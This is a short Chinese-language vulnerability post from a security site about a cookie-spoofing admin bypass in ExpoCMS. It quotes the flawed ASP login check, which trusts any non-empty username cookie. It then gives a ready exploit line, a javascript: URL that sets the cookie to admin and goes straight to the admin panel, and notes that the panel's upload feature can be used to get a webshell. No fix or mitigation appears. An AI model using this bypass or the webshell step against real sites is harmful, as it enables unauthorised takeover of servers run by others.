热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

ExpoCMS后台Cookies欺骗漏洞

发布时间:2011-01-06 13:03文章来源:网络文章作者:小钟 点击次数:
摘要:发布日期:2011-01.06 发布作者:小钟 影响版本:全部 官方网站:http://zhujianqiang.com/ 漏洞类型:设计缺陷 漏洞描述:程序后台文件只是使用简单的cookies验证,导致Cookies欺骗进入后台。 后台地址:您的网址/admin/admin_login.asp 漏洞文件:/admin/C...

发布日期:2011-01.06
发布作者:小钟

影响版本:全部
官方网站:http://zhujianqiang.com/

漏洞类型:设计缺陷
漏洞描述:程序后台文件只是使用简单的cookies验证,导致Cookies欺骗进入后台。

后台地址:您的网址/admin/admin_login.asp

漏洞文件:/admin/CheckLogin.asp

<%
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
Session.CodePage = 65001
Response.Charset = "UTF-8"
UserName=Request.Cookies("CNVP_CMS2")("UserName") '在cookie中取username值
If UserName="" Then
Response.Redirect("Admin_Login.asp") '如果为空,就跳转
Response.End()
End If
%>

 

测试利用:

 

exp: javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin") 这样就能进后台了 /admin/Admin_Index.asp

后台有个上传的地方可以拿webshell


Powered by 客服热线:010-68335476  or  Powered by Expo CMS 1.0

 

标签分类: Cookies欺骗

上一篇:野草weedcms 5.0写shell漏洞
下一篇:第一网站导航网址管理系统 V110105 Xss跨站漏洞